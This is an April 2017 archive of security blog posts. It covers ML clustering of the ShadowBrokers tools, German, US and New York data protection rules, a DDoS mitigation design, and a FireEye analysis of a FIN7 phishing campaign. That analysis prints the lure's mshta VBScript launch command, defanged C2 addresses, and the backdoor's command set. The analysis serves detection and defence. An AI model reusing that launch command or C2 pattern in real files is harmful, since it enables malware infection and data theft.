Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I read a lot of great papers, blog posts and full magazine articles on the ShadowBrokers Leak (free public repositories: here and here) released by WikiLeaks Vault7.  Many of them described the amazing power of such a tools (by the way they are currently used by hackers to exploit systems without MS17-010 patch) other made a great reverse engineering adventures on some of the most used payloads and other again described what is going to happen in the next feature.

So you probably are wandering why am I writing on this discussed topic again? Well, I did not find anyone who decided to extract features on such tools in order to correlate them with notorious payloads and malware. According to my previous blog post  Malware Training Sets: A machine learning dataset for everyone I decided to "refill" my public gitHub repository with more analyses on that topic.

If you are not familiar with this leak you probably want to know that Equation Group's (attributed to NSA) built FuzzBunch software, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows such as: EternalBlue, EternalRomance, Eternal Synergy, etc.. which calls external payloads as well, one of the most famous - as today- is DoublePulsar mainly used in SMB and RDP exploits. The system works straight forward by performing the following steps: 

  • STEP1: Eternalblue launching platform with configuration file (xml in the image) and target ip.

Eternalblue working

  • STEP2: DoublePulsar and additional payloads. Once the Eternablue successfully exploited Windows (in my case it was a Windows 7 SP1) it installs DoublePulsar which could be used as a professional PenTester would use Meterpreter/Empire/Beacon backdoors.  

DoublePulsar usage
  • STEP3: DanderSpritz. A Command and Control Manager to manage multiple implants. It could acts as a C&C Listener or it might be used to directly connect to targets as well.

DanderSpritz


Following the same process described here (and described in the following image) I generated features file for each of the aforementioned Equation Group tools. The process involved files detonation into multiple sandboxes performing both: dynamic analysis and static analysis as well. The analyses results get translated into MIST format and later saved into json files for convenience.


In order to compare previous generated results (aka notorious Malware available here) to the last leak by figuring out if Equation Group is also imputable to have built known Malware (included into the repository), you might decide to use one of the several Machine Learning frameworks available out there. WEKA (developed by University of Waikato) is a romantic Data Mining tool which implements several algorithms and compare them together in order to find the best fit to the data set. Since I am looking for the "best" algorithm to apply production Machine Learning to such dataset I decided to go with  WEKA. It implements several algorithms "ready to go" and it performs auto performance analyses in oder to figure out what algorithm is "best in my case". However WEKA needs a specific format which happens to be called ARFF (described here). I do have a JSON representation of MIST file. I've tried several time to import my MIST JSON file into WEKA but with no luck. So I decided to write a quick and dirty conversion tool really *not performant* and really *not usable in production environment* which converts MIST (JSONized) format into ARFF format. The following script does this job assuming the MIST JSONized content loaded into a mongodb server. NOTE: the script is ugly and written just to make it works, no input controls, no variable controls, a very quick naive and trivial o(m*n^2) loop is implemented. 

From MIST to ARFF

The resulting file MK.arff is a 1.2GB of pure text ready to be analyzed through WEKA or any other Machine Learning tools using the standard ARFF file format. The script is going available here. I am not going to comment nor to describe the results sets, since I wont to reach "governative dangerous conclusions" in my public blog. If you read that blog post to here you should have all the processes, the right data and the desired tools to be able to perform analyses by your own. Following some short inconclusive results with no associated comments.

TEST 1:
Algorithm: Simple K-Mins
Number of clusters: 95 (We know it, since the data is classified)
Seed: 18 (just random choice)
Distance Function: EuclideanDistance, Normalized and Not inverted.

RESULTS (square errors: 5.00):

K-Mins Results

TEST 2 :
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes
TEST 3 :
Algorithm: CobWeb
Number of clusters: to be discovered
Seed: 42

RESULTS: (again few significative cluster were found)

Few descriptive clusters (click to enlarge)

As today many analysts did a great job in study ShadowBrokers leak, but few of them (actually none so far, at least in my knowledge ) tried to cluster result sets derived by dynamic execution of ShadowBrokers leaks. In this post I tried to follow my previous path enlarging my public dataset by offering to security researcher data, procedures and tools to make their own analyses.

German Federal Parliament Passes New German Data Protection Act

This post has been updated. 

On April 27, 2017, the German Federal Parliament adopted the new German Federal Data Protection Act (Bundesdatenschutzgesetz) (“new BDSG”) to replace the existing Federal Data Protection Act of 2003. The new BDSG is intended to adapt the current German data protection law to the EU General Data Protection Regulation (“GDPR”), which will become effective on May 25, 2018.

The new BDSG includes specific requirements that deviate from the GDPR in some respects, including with respect to the appointment of a Data Protection Officer and the processing of employee personal data. The GDPR allows for certain EU Member State deviations from the text of the GDPR. In addition, the new BDSG imposes specific data processing requirements with respect to video surveillance, and consumer credit, scoring and creditworthiness. In addition to the high fines imposed by the GDPR, the new BDSG imposes fines of up to EUR 50,000 for violations regarding German law exclusively.

The new BDSG must now be approved by the German Federal Council, which is expected to occur in the next couple of weeks, possibly during the May 12, 2017 plenary meeting. Once adopted, the new BDSG will become effective on May 25, 2018, at the same time as the GDPR.

Read the new German Federal Data Protection Act (only available in German).

Update: On May 12, 2017, the German Federal Council approved the new BDSG, which will become effective on May 25, 2018, at the same time as the GDPR.

Update: On July 5, 2017, the new BDSG was published in the Federal Law Gazette.

Hack Naked News #121 – April 27, 2017

Windows boxes are getting pwned, vulnerabilities in SugarCRM, Ashley Madison is back in the news, and more. Jason Wood of Paladin Security joins us to deliver expert commentary on hacking cars with radio gadgets on this episode of Hack Naked News!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/HNNEpisode121 Visit http://www.securityweekly.com for all the latest episodes!

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.

To read this article in full, please click here

New York Publishes FAQs and Key Dates for Cybersecurity Regulation

Earlier this month, the New York State Department of Financial Services (“NYDFS”) recently published FAQs and key dates for its cybersecurity regulation (the “NYDFS Regulation”) for financial institutions that became effective on March 1, 2017.

The FAQs address topics including:

  • whether a covered entity is required to give notice to consumers affected by a cybersecurity event;
  • whether a covered entity may adopt portions of an affiliate’s cybersecurity program without adopting all of it;
  • whether DFS-authorized New York branches, agencies and representative offices of out-of-country foreign banks are required to comply with the NYDFS Regulation;
  • what constitutes “continuous monitoring” for purposes of the NYDFS Regulation;
  • how a covered entity should submit Notices of Exemption, Certifications of Compliance and Notices of Cybersecurity Events; and
  • whether an entity can be both a covered entity and a third-party service provider under the NYDFS Regulation.

The NYDFS also listed key dates for the NYDFS Regulation, which include:

  • March 1, 2017 – the NYDFS Regulation becomes effective.
  • August 28, 2017 – the 180-day transitional period ends and covered entities are required to be in compliance with requirements of the NYDFS Regulation unless otherwise specified.
  • September 27, 2017 – the initial 30-day period for filing Notices of Exemption ends.
  • February 15, 2018 – covered entities are required to submit the first certification under the NYDFS Regulation on or prior to this date.
  • March 1, 2018 – the one year transitional period ends. Covered entities are required to comply with certain requirements such as those related to penetration testing, vulnerability assessments, risk assessment and cybersecurity training.
  • September 3, 2018 – the eighteen month transitional period ends. Covered entities are required to comply with audit trail, data retention and encryption requirements.
  • March 1, 2019 – the two year transitional period ends. Covered entities are required to develop a third-party service provider compliance program.

In a recent conference of the National Association of Insurance Commissioners, Maria Vullo, the NYDFS superintendent, stated that “The New York regulation is a road map with rules of the road.”

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDOS attacks

DDOS attacks seem to be new norm on the Internet. Years before only big websites and web applications got attacked but nowadays also rather small and medium companies or institutions get attacked. This makes it necessary for administrators of smaller sites to plan for the time they get attacked. This blog post shows you what you can do yourself and for what stuff you need external help. As you’ll see later you most likely can only mitigate DDOS attacks against the application layer by yourself and need help for all other attacks. One important part of a successful defense against a DDOS attack, which I won’t explain here in detail, is a good media strategy. e.g. If you can convince the media that the attack is no big deal, they may not report sensational about it and make the attack appear bigger and more problematic than it was. A classic example is a DDOS against a website that shows only information and has no impact on the day to day operation. But there are better blogs for this non technical topic, so lets get into the technical part.

different DDOS attacks

From the point of an administrator of a small website or web application there are basically 3 types of attacks:

  • An Attack that saturates your Internet or your providers Internet connection. (bandwidth and traffic attack)
  • Attacks against your website or web application itself. (application attack)

saturation attacks

Lets take a closer look at the first type of attack. There are many different variations of this connection saturation attacks and it does not matter for the SME administrator. You can’t do anything against it by yourself. Why? You can’t do anything on your server as the good traffic can’t reach your server as your Internet connection or a connection/router of your Internet Service Provider (ISP) is already saturated with attack traffic. The mitigation needs to take place on a system which is before the part that is saturated. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Networks (CDN). A CDN basically caches the data of your website in multiple geographical distributed locations. This way each location gets only attacked by a part of the attacking systems. This is a nice way to also guard against many application layer attacks but does not work (or not easily) if the content of your site is not the same for every client / user. e.g. an information website with some downloads and videos is easily changed to use a CDN but a application like a Webmail system or an accounting system will be hard to adapt and will not gain 100% protection even than. An other problem with CDNs is that you must protect each website separately, thats ok if you’ve only one big website that is the core of your business, but will be a problem if attacker can choose from multiple sites/applications. An classic example is that a company does protect its homepage with an CDN but the attacker finds via Google the Webmail of the companies Exchange Server. Instead of attacking the CDN, he attacks the Internet connection in front of the Qebmail. The problem will now most likely be that the VPN site-2-site connections to the remote offices of the company are down and working with the central systems is not possible anymore for the employees in the remote locations.

So let assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. Following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDOS mitigation tool. These tools take all traffic and will filter most of the bad traffic out. For this to work the mitigation tool needs to know your normal traffic patterns and the DDOS needs to be small enough that the Internet connections of the provider are able to handle it. Some companies sell on on-premise mitigation tools, don’t buy it, its wasting money.
  • If the DDOS attack is against an IP address, which is not mission critical (e.g. attack is against the website, but the web application is the critical system) let the provider block all traffic to that IP address. If the provider as an agreement with its upstream provider it is even possible to filter that traffic before it reaches the provider and so this works also if the ISPs Internet connection can not handle the attack.
  • If you have your own IP space it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and e.g. only announce it to local providers. This helps to minimize the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is specially a good mitigation method, if you’re main audience is local. e.g. 90% of your customers/clients are from the same region or country as you’re – you don’t care during an attack about IP address from x (x= foreign far away country).
  • A special technique of the last topic is to connect to a local Internet exchange which maybe also helps to reduce your Internet costs but in any case raises your resilience against DDOS attacks.

This covers the basics which allows you to understand and talk with your providers eye to eye. There is also a subsection of saturation attacks which does not saturate the connection but the server or firewall (e.g. syn floods) but as most small and medium companies will have only up to a one Gbit Internet connection it is unlikely that a descend server (and its operating system) or firewall is the limiting factor, most likely its the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDOS. Lets start with an example to describe this kind of attacks. Some years ago a common attack was to use the ping back feature of WordPress installations to flood a given URL with requests. I’ve seen such an attack which requests on a special URL on an target system, which did something CPU and memory intensive, which let to a successful DDOS against the application with less than 10Mbit traffic. All requests were valid requests and as the URL was an HTTPS one (which is more likely than not today) a mitigation in the network was not possible. The solution was quite easy in this case as the HTTP User Agent was WordPress which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would be easy to bypassed if the attacker sees it and changes his requests on his botnet. Which also leads to the main problem with this kind of attacks. You need to be able to block the bad traffic and let the good traffic through. Persistent attackers commonly change the attack mode – an attack is done in method 1 until you’re able to filter it out, than the attacker changes to the next method. This can go on for days. Do make it harder for an attacker it is a good idea to implement some kind of human vs bot detection method.

I’m human

The “I’m human” button from Google is quite well known and the technique behind it is that it rates the connection (source IP address, cookies (from login sessions to Google, …) and with that information it decides if the request is from a human or not. If the system is sure the request is from a human you won’t see anything. In case its sightly unsure a simple green check-mark will be shown, if its more unsure or thinks the request is by a bot it will show a CAPTCHA.  So the question is can we implement something similar by ourself. Sure we can, lets dive into it.

peace time

Set an special DDOS cookie if an user is authenticated correctly, during peace time. I’ll describe the data in the cookie later in detail.

war time

So lets say, we detected an attack manually or automatically by checking the number of requests eg. against the login page. In that case the bot/human detection gets activated. Now the web server checks for each request the presence of the DDOS cookie and if the cookie can be decoded correctly. All requests which don’t contain a valid DDOS cookie get redirected temporary to a separate host e.g. https://iamhuman.example.org. The referrer is the original requested URL. This host runs on a different server (so if it gets overloaded it does not effect the normal users). This host shows a CAPTCHA and if the user solves it correctly the DDOS cookie will be set for example.org and a redirect to the original URL will be send.

Info: If you’ve requests from some trusted IP ranges e.g. internal IP address or IP ranges from partner organizations you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against it write the IP address of the client encrypted into the cookie. Also put the timestamp of the creation of the cookie encrypted into it. Also storing the username, if the cookie got created by the login process, is a good idea to check which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES128 GCM) and put following into it:

  • NONCE
  • typ
    • L for Login cookie
    • C for Captcha cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for the encryption/decryption of the cookie is static and does not leave the servers. The cookie should be set for the whole domain to be able to protected multiple websites/applications. Also make it HttpOnly to make stealing it harder.

implementation

On the normal web server which checks the cookie following implementations are possible:

  • The apache web server provides a module called mod_session_* which provides some functionality but not all
  • The apache module rewriteMap (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) and using „prg: External Rewriting Program“ should allow everything. Performance may be an issue.
  • Your own Apache module

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple.

  • Use any minimalistic website with PHP/Java/Python to create cookie
  • Create your own CAPTCHA or integrate a solution like Recaptcha

pro and cons

  • Pro
    • Users than accessed authenticated within the last weeks won’t see the DDOS mitigation. Most likely these are your power users / biggest clients.
    • Its possible to step up the protection gradually. e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check for the cookie.
    • The most likely case of an attack is that the cookie is not set at all which does take really few CPU resources to check.
    • Sending an 302 to the bot does create only a few bytes of traffic and if the bot requests the redirected URL it on an other server and there no load on the server we want to protect.
    • No change to the applications is necessary
    • The operations team does not to be experts in mitigating attacks against the application layer. Simple activation is enough.
    • Traffic stats local and is not send to external provider (which may be a problem for a bank or with data protections laws in Europe)
  • Cons
    • How to handle automatic requests (API)? Make exceptions for these or block them in case of an attack?
    • Problem with non browser Clients like ActiveSync clients.
    • Multiple domains need multiple cookies

All in all I see it as a good mitigation method for application layer attacks and I hope the blog post did help you and your business. Please leave feedback in the comments. Thx!

FTC Seeks Comment on Proposed Changes to TRUSTe’s COPPA Safe Harbor Program

On April 19, 2017, the FTC announced that it is seeking public comment on proposed changes to TRUSTe, Inc.’s safe harbor program under the Children’s Online Privacy Protection Rule (the “Proposed Changes”). As we previously reported, New York Attorney General Eric T. Schneiderman announced that TRUSTe agreed to settle allegations that it failed to properly verify that customer websites aimed at children did not run third-party software to track users. The Proposed Changes are a result of the settlement agreement between TRUSTe and the New York Attorney General.

Among other changes, the Proposed Changes would require participants in TRUSTe’s safe harbor program to conduct an annual internal assessment of third parties’ collection of personal information from children on their websites or online services. The FTC is seeking comment on the Proposed Changes, including any benefits, costs and alternatives that should be considered. The FTC also is seeking comment on the effectiveness of the mechanisms used to assess compliance with the Proposed Changes.

The Proposed Changes are open for public comment until May 24, 2017.

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on Apple Mac, opening the Mac up to future attack. A refection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Enterprise Security Weekly #41 – Solving Problems

Rami Essaid of Distil networks joins us for an interview. In the news, Cylance battles the malware testing industry, Tanium’s CEO issues an apology, Malwarebytes integrates with ForeScout, and more in this episode of Enterprise Security Weekly!Full show notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode41 Visit http://www.securityweekly.com for all the latest episodes!

German DPA Publishes English Translation of Standard Data Protection Model

On April 13, 2017, the North Rhine-Westphalia State Commissioner for Data Protection and Freedom of Information published an English translation of the draft Standard Data Protection Model (“SDM”). The SDM was adopted in November 2016 at the Conference of the Federal and State Data Protection Commissioners. 

German data protection authorities (“DPAs”) are currently reviewing the SDM, and the final version is expected to be published later this year. The English version of the SDM is a literal translation of the German text. An international version of the SDM currently is being prepared by the German DPAs.

The SDM contains a catalogue of data security measures and creates a methodology with respect to how the EU General Data Protection Regulation’s (“GDPR’s”) general security requirements should be implemented in practice. The SDM aims to harmonize how German DPAs review data security measures. The SDM also aims to assist companies in planning, implementing and reviewing their data security measures. The SDM structures the legal requirements in terms of data protection goals, such as data minimization, availability, integrity, confidentiality, transparency, “unlinkability” and “intervenability.”

In the current version, the SDM takes into account the GDPR wherever it contains references to German legal requirements, and is applicable until the GDPR takes effect in May 2018.

Read the SDM in English and German.

OCR Settlement Underscores Importance of Risk Analysis and Risk Management

On April 12, 2017, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into a resolution agreement with Metro Community Provider Network (“MCPN”) that stemmed from MCPN’s lack of a risk analysis and risk management plan that addressed risks and vulnerabilities to protected health information (“PHI”).

In January 2012, MCPN submitted a breach report to OCR indicating that it had suffered a breach following a phishing incident that affected 3,200 patients. OCR investigated MCPN and found that, while MCPN had taken corrective action following the incident, it had failed to conduct a risk analysis until February 2012 or implement a risk management plan. In addition, the risk analysis MCPN eventually conducted was deemed “insufficient to meet the requirements of the Security Rule.”

The resolution agreement requires MCPN to pay $400,000 to OCR and enter into a Corrective Action Plan that obligates MCPN to:

  • conduct a risk analysis and submit it to OCR for review and approval;
  • implement a risk management plan to address and mitigate the risks and vulnerabilities identified in the risk analysis;
  • revise its policies and procedures based on the findings of the risk analysis;
  • review and revise its HIPAA training materials;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports for a period of three years.

In the settlement with MCPN, OCR balanced MCPN’s HIPAA violations with its status as a federally qualified health center that provides medical care to patients who have incomes at or below the poverty level. OCR Director Roger Severino stated that “Patients seeking health care trust that their providers will safeguard and protect their health information. Compliance with the HIPAA Security Rule helps covered entities meet this important obligation to their patient communities.”

Privacy Compliance Company Agrees to a Settlement with the New York Attorney General

On April 6, 2017, New York Attorney General Eric T. Schneiderman announced that privacy compliance company TRUSTe, Inc., agreed to settle allegations that it failed to properly verify that customer websites aimed at children did not run third-party software to track users. According to Attorney General Schneiderman, the enforcement action taken by the NY AG is the first to target a privacy compliance company over children’s privacy.

TRUSTe was certified by the FTC to operate a Children’s Online Privacy Protection Act (“COPPA”) safe harbor program, under which companies could use its COPPA services to demonstrate compliance with the law. The NY AG alleged that TRUSTe failed to run scans of “most or all” of its 32 customers’ websites for third-party tracking technology on the children’s webpages of those websites. The NY AG further alleged that TRUSTe “failed to make a reasonable determination as to whether third-party tracking technologies present on clients’ websites violated COPPA, certifying child-directed websites despite information indicating that third parties present on those websites collected and used the personal information of users in a manner prohibited by COPPA.”

Under the terms of the settlement, TRUSTe agreed to pay $100,000 and “adopt new measures to strengthen its privacy assessments,” including (1) conducting an annual review of the information policies, practices and representations of each customer that participates in its COPPA safe harbor program; (2) requiring customers to conduct comprehensive internal assessments of their practices relating to information collection and use and (3) providing regular training to individuals responsible for performing assessments within the COPPA safe harbor program.

New Mexico Enacts Data Breach Notification Law

On April 6, 2017, New Mexico became the 48th state to enact a data breach notification law, leaving Alabama and South Dakota as the two remaining states without such requirements. The Data Breach Notification Act (H.B. 15) goes into effect on June 16, 2017.

Key Provisions of New Mexico’s Data Breach Notification Act:

  • The definition of “personal identifying information” includes biometric data, defined as an individual’s “fingerprints, voice print, iris or retina patterns, facial characteristics or hand geometry that is used to uniquely and durably authenticate an individual’s identity when the individual accesses a physical location, device, system or account.”
  • The law applies to unencrypted computerized data or encrypted computerized data when the encryption key or code is also compromised.
  • Notice to the New Mexico Office of the Attorney General and the major consumer reporting agencies is required if more than 1,000 New Mexico residents are notified.
  • Notice must be made to New Mexico residents (and the Attorney General and Consumer Reporting agencies if over 1,000 residents are notified) within 45 calendar days of discovery of a security breach.
    • Third-party service providers are also required to notify the data owner or licensor within 45 days of discovery of a data breach.
  • Notification is not required if, after an appropriate investigation, it is determined that the security breach does not give rise to a significant risk of identity theft or fraud.
  • Entities that are subject to the Gramm-Leach Bliley Act or HIPAA are exempt from the statute.
  • The law also contains a data disposal provision that requires data owners or licensors to shred, erase or otherwise make unreadable personal identifying information contained in records when it is no longer “reasonably needed” for business purposes.
  • In addition, the law requires data owners and licensors to implement and maintain reasonable security procedures and practices designed to protect the personal identifying information from unauthorized access, destruction, use, modification or disclosure.
    • Contracts with third-party service providers must require that the service provider implement and maintain such security procedures and practices.

CIPL Issues Discussion Paper on GDPR Certifications

On April 12, 2017, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a discussion paper on Certifications, Seals and Marks under the GDPR and Their Roles as Accountability Tools and Cross-Border Data Transfer Mechanisms (the “Discussion Paper”). The Discussion Paper sets forth recommendations concerning the implementation of the EU General Data Protection Regulation’s (“GDPR’s”) provisions on the development and use of certification mechanisms. The GDPR will become effective on May 25, 2018. The EU Commission, the Article 29 Working Party, individual EU data protection authorities (“DPAs”) and other stakeholders have begun to consider the role of GDPR certifications and how to develop and implement them. CIPL’s Discussion Paper is meant as formal input to that process.

Certifications, seals and marks have the potential to play a significant role in enabling companies to achieve and demonstrate organizational accountability and GDPR compliance for some or all of their services, products or activities. The capability of certifications to provide a comprehensive GDPR compliance structure will be particularly useful for small and medium-sized enterprises. For large and multinational companies, certifications may facilitate business arrangements with business partners and service providers. In addition, certifications, seals and marks can be used as accountable, safe and efficient cross-border data transfer mechanisms under the GDPR, provided they are coupled with binding and enforceable commitments. Finally, there is potential for creating interoperability with other legal regimes, as well as with similar certifications, seals and marks in other regions. Thus, as explained in the Discussion Paper, certifications may present real benefits for all stakeholders, including individuals, organizations and DPAs.

To reap the full benefit of certifications, however, according to CIPL, it is crucial that certifications are efficiently operated, incentivized and clearly accompanied by benefits for certified organizations. Otherwise, organizations will be reluctant to invest time and money in obtaining and maintaining GDPR certifications.

The Discussion Paper contains the following “Top Ten” messages:

  • Certification should be available for a product, system, service, particular process or an entire privacy program.
  • There is a preference for a common EU GDPR baseline certification for all contexts and sectors, which can be differentiated in its application by different certification bodies during the certification process.
  • The EU Commission and/or the European Data Protection Board (“EDPB”), in collaboration with certification bodies and industry, should develop the minimum elements of this common EU GDPR baseline certification, which may be used directly, or to which specific other sectoral or national GDPR certifications should be mapped.
  • The differentiated application of the common EU GDPR certification for specific sectors may be informed by sector-specific codes of conduct.
  • Overlap and proliferation of certifications should be avoided so as not to create consumer/stakeholder confusion or make it less attractive for organizations seeking certification.
  • Certifications must be adaptable to different contexts, scalable to the size of the company and nature of the processing, and affordable.
  • GDPR certifications must be consistent with, and take into account, other certification schemes and be able to interact with or be as interoperable as possible (this includes ISO/IEC Standards, the EU-U.S. and Swiss-U.S. Privacy Shield frameworks, APEC CBPR and the Japan Privacy Mark).
  • The EU Commission and/or the EDPB should prioritize developing a common EU GDPR certification for purposes of data transfers pursuant to Article 46(2)(f).
  • Organizations should be able to leverage their BCR approvals to receive or streamline certification under an EU GDPR certification.
  • DPAs should incentivize and publicly affirm certifications as a recognized means to demonstrate GDPR compliance, and as a mitigating factor in case of enforcement, subject to the possibility of review of specific instances of noncompliance.

The Discussion Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 70 private sector organizations, with active engagement and participation by many EU-based data protection and governmental authorities, academics and other stakeholders.

Battery Backup PSA

One of the better things you can do to protect your money spent on electronics devices is have a good surge protector and battery backup.   If you’re like me, you only buy the kind where you can disable the audible alarms.  The problem with this is now you might not get any warning if the battery goes bad.

